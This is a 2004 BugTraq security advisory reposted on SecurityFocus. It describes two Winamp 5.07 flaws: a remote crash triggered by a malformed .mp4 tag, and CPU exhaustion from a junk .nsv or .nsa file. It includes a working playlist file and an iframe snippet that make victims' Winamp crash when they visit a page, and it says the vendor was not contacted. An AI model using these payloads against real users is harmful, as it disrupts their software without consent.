BugTraq
Winamp 5.07 (latest version) Remote Crash + other stupid shizle Dec 13 2004 07:13PM
b0f www.b0f.net (b0fnet yahoo com)


Winamp 5.07 (latest version) Remote Crash.

+ vuln to cause 100% cpu usage.

13/12/04

I. BACKGROUND

Winamp is a very popular windows audio

and video player. It also has alot

of other features and is used by

millions of people across the world.

II. DESCRIPTION

VULN 1.

There is a vuln in winamp's handling of .mp4

and .m4a files. Which when exploited can

remotly crash the victims winamp.

The vuln lies in the .mp4 tagging system

which winamp uses.If you use winamps built

in feature to edit the tags on .mp4 or .m4a

files and insert any data in there the next

time the file is opened it will instantly

crash winamp.

now how to crash it remotly.

if we create a .pls file contaning the data

[playlist]

numberofentries=5

File1=http://b0f.pwp.blueyonder.co.uk/a.mp4

Title1=

Length5=-1

Version=2

and make a html page containing an iframe linking

to the .pls like.

<html>

<iframe src="http://b0f.pwp.blueyonder.co.uk/exp2.pls">

now if the victim clicks a link to a page like

http://b0f.pwp.blueyonder.co.uk/wexp3.htm

it will auto open up the .pls file and load the .mp4

file into winamp and crash it.

This could also be done with .m3u instead of .pls

VULN 2.

This one is simple if you create say a 1mb file

probably smaller filled with junk and name it

with either .nsv or .nsa file extension.

When opened in winamp it will cause 100% cpu

usage. The bigger the size of the file the

more it will probably slow down the system.

III. ANALYSIS

Vuln 1.

Successful exploitation allows remote attackers to

crash the victims winamp.

Vuln 2.

Successful exploitation causes 100% cpu usage.

IV. DETECTION

This has been confirmed in the latest version of winamp

5.07 and probably vuln in earlier versions.

V. WORKAROUND

Don't open suspicous .mp4 .m4a .nsa or .nsv files or click untrusted links.

VI. VENDOR

The vendor has not been contacted.

Why bother ? one asks

VII. CREDIT

Alan M aka b0f

(b0fnet (at) yahoo (dot) com [email concealed])

P.S Buy Tupac - Loyal to the Game

out 14/12/04

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus